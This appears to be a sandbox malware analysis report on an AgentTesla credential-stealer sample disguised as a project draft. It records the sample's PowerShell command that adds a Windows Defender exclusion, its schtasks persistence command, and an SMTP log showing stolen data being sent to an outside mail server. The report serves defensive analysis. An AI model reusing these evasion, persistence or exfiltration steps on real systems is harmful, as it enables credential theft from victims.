                                                                    SHA-512:74BA625FC5E576FC05DED5DEFAAA187FFE52FAEBB7680A7B6B2F35F1FA6A8B879AA62F836284DE07D4FBDAC7B5A79F6AD3A6C4FF8E275B7B7763B06B7E63B3FB
                                                                    Malicious:false
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211202163923..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 980108 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\eyjBzJU.exe..Process ID: 6156..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211202163923..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\eyjBzJU.exe..**********************..Windows PowerShell transcript start..Start time: 20211202164329..Username: computer\user..RunAs User: computer\user..Con

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.757723120728433
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:CO DRAFT Al Zaytounah project.exe
                                                                    File size:496640
                                                                    MD5:80cec5a926b23b289405700083013293
                                                                    SHA1:fbe4b963e5247b52a42ef7485fc2006a77ecbe3a
                                                                    SHA256:556b249f8b149348daec751c26360cb2cb5abc61a5f067281e14d771a4817086
                                                                    SHA512:db2e3e054b6910982ba8a1758b4b44ea27bdc252380c5d02c8fd8c458f3742c3d415c4bcbc0cdec8c146633d301a969180b9d9b5e9882fd9f8ca2ef22e9e6638
                                                                    SSDEEP:12288:V5Bt/E9PyWvCNaG5W1YBnB4w6jRtOnE0TP+:zcPyWv4aGM1Q4w66E0
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..N...D......*l... ........@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:8e139232d9cc348a

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x476c2a
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0xB8CA9CB1 [Thu Mar 29 22:35:29 2068 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]

                                                                    Data Directories

                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x76bd8 | 0x4f | .text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x78000 | 0x40d0 | .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7e000 | 0xc | .reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x76bbc | 0x1c | .text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                    Sections

                                                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                    .text | 0x2000 | 0x74c30 | 0x74e00 | False | 0.895134943182 | data | 7.82200037315 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc | 0x78000 | 0x40d0 | 0x4200 | False | 0.178562973485 | data | 3.48705835154 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc | 0x7e000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    Name | RVA | Size | Type | Language | Country
                                                                    RT_ICON | 0x78190 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                                    RT_ICON | 0x785f8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294577920, next used block 4294577920 | |
                                                                    RT_ICON | 0x796a0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294577920, next used block 4277800704 | |
                                                                    RT_GROUP_ICON | 0x7bc48 | 0x30 | data | |
                                                                    RT_VERSION | 0x7bc78 | 0x26c | data | |
                                                                    RT_MANIFEST | 0x7bee4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                                    Imports

                                                                    DLL | Import
                                                                    mscoree.dll | _CorExeMain

                                                                    Version Infos

                                                                    Description | Data
                                                                    Translation | 0x0000 0x04b0
                                                                    LegalCopyright |
                                                                    Assembly Version | 0.0.0.0
                                                                    InternalName | IdentifierAuthori.exe
                                                                    FileVersion | 0.0.0.0
                                                                    ProductVersion | 0.0.0.0
                                                                    FileDescription |
                                                                    OriginalFilename | IdentifierAuthori.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                    12/02/21-16:41:04.503070 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    12/02/21-16:41:07.276201 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49804 | 587 | 192.168.2.4 | 198.54.126.165

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Dec 2, 2021 16:41:03.094677925 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:03.260797977 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:03.260974884 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:03.471905947 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:03.472251892 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:03.638493061 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:03.639396906 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:03.806386948 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:03.806868076 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:03.989881992 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:03.997076035 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:04.163391113 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:04.163904905 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:04.334196091 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:04.335347891 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:04.501511097 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:04.501540899 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:04.503070116 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:04.503294945 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:04.504085064 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:04.504228115 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:04.669442892 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:04.670600891 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:04.684218884 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:04.728302956 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:05.720310926 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:05.887752056 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:05.891658068 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:05.891877890 CET | 49803 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:05.893279076 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:06.058933020 CET | 587 | 49803 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:06.060275078 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:06.063221931 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:06.232799053 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:06.232995033 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:06.399544954 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:06.399791002 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:06.569741011 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:06.596616030 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:06.770803928 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:06.771226883 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:06.938000917 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:06.938230991 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:07.107525110 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:07.107837915 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:07.274607897 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:07.274637938 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:07.276079893 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276201010 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276320934 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276416063 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276582956 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276668072 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276741982 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:07.276828051 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165
                                                                    Dec 2, 2021 16:41:07.442828894 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:07.442862988 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:07.442878008 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:07.442894936 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:07.454941988 CET | 587 | 49804 | 198.54.126.165 | 192.168.2.4
                                                                    Dec 2, 2021 16:41:07.509731054 CET | 49804 | 587 | 192.168.2.4 | 198.54.126.165

                                                                    UDP Packets

                                                                    Timestamp                            | Source Port | Dest Port | Source IP   | Dest IP
                                                                    Dec 2, 2021 16:41:03.027568102 CET   | 56627       | 53        | 192.168.2.4 | 8.8.8.8
                                                                    Dec 2, 2021 16:41:03.061382055 CET   | 53          | 56627     | 8.8.8.8     | 192.168.2.4

                                                                    DNS Queries

                                                                    Timestamp                            | Source IP   | Dest IP | Trans ID | OP Code            | Name                      | Type           | Class
                                                                    Dec 2, 2021 16:41:03.027568102 CET   | 192.168.2.4 | 8.8.8.8 | 0x3ee6   | Standard query (0) | server126.web-hosting.com | A (IP address) | IN (0x0001)

                                                                    DNS Answers

                                                                    Timestamp                            | Source IP | Dest IP     | Trans ID | Reply Code   | Name                      | CName | Address        | Type           | Class
                                                                    Dec 2, 2021 16:41:03.061382055 CET   | 8.8.8.8   | 192.168.2.4 | 0x3ee6   | No error (0) | server126.web-hosting.com |       | 198.54.126.165 | A (IP address) | IN (0x0001)

                                                                    SMTP Packets

                                                                    Timestamp                            | Source Port | Dest Port | Source IP      | Dest IP        | Commands
                                                                    Dec 2, 2021 16:41:03.471905947 CET   | 587         | 49803     | 198.54.126.165 | 192.168.2.4    | 220-server126.web-hosting.com ESMTP Exim 4.94.2 #2 Thu, 02 Dec 2021 10:41:03 -0500
                                                                                                         |             |           |                |                | 220-We do not authorize the use of this system to transport unsolicited,
                                                                                                         |             |           |                |                | 220 and/or bulk e-mail.
                                                                    Dec 2, 2021 16:41:03.472251892 CET   | 49803       | 587       | 192.168.2.4    | 198.54.126.165 | EHLO 980108
                                                                    Dec 2, 2021 16:41:03.638493061 CET   | 587         | 49803     | 198.54.126.165 | 192.168.2.4    | 250-server126.web-hosting.com Hello 980108 [84.17.52.65]
                                                                                                         |             |           |                |                | 250-SIZE 52428800
                                                                                                         |             |           |                |                | 250-8BITMIME
                                                                                                         |             |           |                |                | 250-PIPELINING
                                                                                                         |             |           |                |                | 250-PIPE_CONNECT
                                                                                                         |             |           |                |                | 250-AUTH PLAIN LOGIN
                                                                                                         |             |           |                |                | 250-STARTTLS
                                                                                                         |             |           |                |                | 250 HELP
                                                                    Dec 2, 2021 16:41:03.639396906 CET   | 49803       | 587       | 192.168.2.4    | 198.54.126.165 | AUTH login bWlsbGlAZW1yZW1ldGFsLnh5eg==
                                                                    Dec 2, 2021 16:41:03.806386948 CET   | 587         | 49803     | 198.54.126.165 | 192.168.2.4    | 334 UGFzc3dvcmQ6
                                                                    Dec 2, 2021 16:41:03.989881992 CET   | 587         | 49803     | 198.54.126.165 | 192.168.2.4    | 235 Authentication succeeded
                                                                    Dec 2, 2021 16:41:03.997076035 CET   | 49803       | 587       | 192.168.2.4    | 198.54.126.165 | MAIL FROM:<milli@emremetal.xyz>
                                                                    Dec 2, 2021 16:41:04.163391113 CET   | 587         | 49803     | 198.54.126.165 | 192.168.2.4    | 250 OK
                                                                    Dec 2, 2021 16:41:04.163904905 CET   | 49803       | 587       | 192.168.2.4    | 198.54.126.165 | RCPT TO:<milli@emremetal.xyz>
                                                                    Dec 2, 2021 16:41:04.334196091 CET   | 587         | 49803     | 198.54.126.165 | 192.168.2.4    | 250 Accepted
                                                                    Dec 2, 2021 16:41:04.335347891 CET   | 49803       | 587       | 192.168.2.4    | 198.54.126.165 | DATA
                                                                    Dec 2, 2021 16:41:04.501540899 CET   | 587         | 49803     | 198.54.126.165 | 192.168.2.4    | 354 Enter message, ending with "." on a line by itself
                                                                    Dec 2, 2021 16:41:04.504228115 CET   | 49803       | 587       | 192.168.2.4    | 198.54.126.165 | .
                                                                    Dec 2, 2021 16:41:04.684218884 CET   | 587         | 49803     | 198.54.126.165 | 192.168.2.4    | 250 OK id=1msoCm-00D3As-DW
                                                                    Dec 2, 2021 16:41:05.720310926 CET   | 49803       | 587       | 192.168.2.4    | 198.54.126.165 | QUIT
                                                                    Dec 2, 2021 16:41:05.887752056 CET   | 587         | 49803     | 198.54.126.165 | 192.168.2.4    | 221 server126.web-hosting.com closing connection
                                                                    Dec 2, 2021 16:41:06.232799053 CET   | 587         | 49804     | 198.54.126.165 | 192.168.2.4    | 220-server126.web-hosting.com ESMTP Exim 4.94.2 #2 Thu, 02 Dec 2021 10:41:06 -0500
                                                                                                         |             |           |                |                | 220-We do not authorize the use of this system to transport unsolicited,
                                                                                                         |             |           |                |                | 220 and/or bulk e-mail.
                                                                    Dec 2, 2021 16:41:06.232995033 CET   | 49804       | 587       | 192.168.2.4    | 198.54.126.165 | EHLO 980108
                                                                    Dec 2, 2021 16:41:06.399544954 CET   | 587         | 49804     | 198.54.126.165 | 192.168.2.4    | 250-server126.web-hosting.com Hello 980108 [84.17.52.65]
                                                                                                         |             |           |                |                | 250-SIZE 52428800
                                                                                                         |             |           |                |                | 250-8BITMIME
                                                                                                         |             |           |                |                | 250-PIPELINING
                                                                                                         |             |           |                |                | 250-PIPE_CONNECT
                                                                                                         |             |           |                |                | 250-AUTH PLAIN LOGIN
                                                                                                         |             |           |                |                | 250-STARTTLS
                                                                                                         |             |           |                |                | 250 HELP
                                                                    Dec 2, 2021 16:41:06.399791002 CET   | 49804       | 587       | 192.168.2.4    | 198.54.126.165 | AUTH login bWlsbGlAZW1yZW1ldGFsLnh5eg==
                                                                    Dec 2, 2021 16:41:06.569741011 CET   | 587         | 49804     | 198.54.126.165 | 192.168.2.4    | 334 UGFzc3dvcmQ6
                                                                    Dec 2, 2021 16:41:06.770803928 CET   | 587         | 49804     | 198.54.126.165 | 192.168.2.4    | 235 Authentication succeeded
                                                                    Dec 2, 2021 16:41:06.771226883 CET   | 49804       | 587       | 192.168.2.4    | 198.54.126.165 | MAIL FROM:<milli@emremetal.xyz>
                                                                    Dec 2, 2021 16:41:06.938000917 CET   | 587         | 49804     | 198.54.126.165 | 192.168.2.4    | 250 OK
                                                                    Dec 2, 2021 16:41:06.938230991 CET   | 49804       | 587       | 192.168.2.4    | 198.54.126.165 | RCPT TO:<milli@emremetal.xyz>
                                                                    Dec 2, 2021 16:41:07.107525110 CET   | 587         | 49804     | 198.54.126.165 | 192.168.2.4    | 250 Accepted
                                                                    Dec 2, 2021 16:41:07.107837915 CET   | 49804       | 587       | 192.168.2.4    | 198.54.126.165 | DATA
                                                                    Dec 2, 2021 16:41:07.274637938 CET   | 587         | 49804     | 198.54.126.165 | 192.168.2.4    | 354 Enter message, ending with "." on a line by itself
                                                                    Dec 2, 2021 16:41:07.276828051 CET   | 49804       | 587       | 192.168.2.4    | 198.54.126.165 | .
                                                                    Dec 2, 2021 16:41:07.454941988 CET   | 587         | 49804     | 198.54.126.165 | 192.168.2.4    | 250 OK id=1msoCp-00D3EG-6C

                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    System Behavior

                                                                    General

                                                                    Start time: 16:39:17
                                                                    Start date: 02/12/2021
                                                                    Path: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    Wow64 process (32bit): true
                                                                    Commandline: "C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe"
                                                                    Imagebase: 0xec0000
                                                                    File size: 496640 bytes
                                                                    MD5 hash: 80CEC5A926B23B289405700083013293
                                                                    Has elevated privileges: true
                                                                    Has administrator privileges: true
                                                                    Programmed in: .Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation: low

                                                                    General

                                                                    Start time: 16:39:20
                                                                    Start date: 02/12/2021
                                                                    Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit): true
                                                                    Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe"
                                                                    Imagebase: 0xdf0000
                                                                    File size: 430592 bytes
                                                                    MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges: true
                                                                    Has administrator privileges: true
                                                                    Programmed in: .Net C# or VB.NET
                                                                    Reputation: high

                                                                    General

                                                                    Start time: 16:39:21
                                                                    Start date: 02/12/2021
                                                                    Path: C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit): false
                                                                    Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase: 0x7ff724c50000
                                                                    File size: 625664 bytes
                                                                    MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges: true
                                                                    Has administrator privileges: true
                                                                    Programmed in: C, C++ or other language
                                                                    Reputation: high

                                                                    General

                                                                    Start time: 16:39:21
                                                                    Start date: 02/12/2021
                                                                    Path: C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit): true
                                                                    Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp"
                                                                    Imagebase: 0xa40000
                                                                    File size: 185856 bytes
                                                                    MD5 hash: 15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges: true
                                                                    Has administrator privileges: true
                                                                    Programmed in: C, C++ or other language
                                                                    Reputation: high

                                                                    General

                                                                    Start time: 16:39:23
                                                                    Start date: 02/12/2021
                                                                    Path: C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit): false
                                                                    Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase: 0x7ff724c50000
                                                                    File size: 625664 bytes
                                                                    MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges: true
                                                                    Has administrator privileges: true
                                                                    Programmed in: C, C++ or other language
                                                                    Reputation: high

                                                                    General

                                                                    Start time: 16:39:24
                                                                    Start date: 02/12/2021
                                                                    Path: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    Wow64 process (32bit): true
                                                                    Commandline: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    Imagebase: 0x700000
                                                                    File size: 496640 bytes
                                                                    MD5 hash: 80CEC5A926B23B289405700083013293
                                                                    Has elevated privileges: true
                                                                    Has administrator privileges: true
                                                                    Programmed in: .Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.929441130.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.929441130.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.679161124.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.679161124.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.679523087.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.679523087.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation: low

                                                                    Disassembly

                                                                    Code Analysis
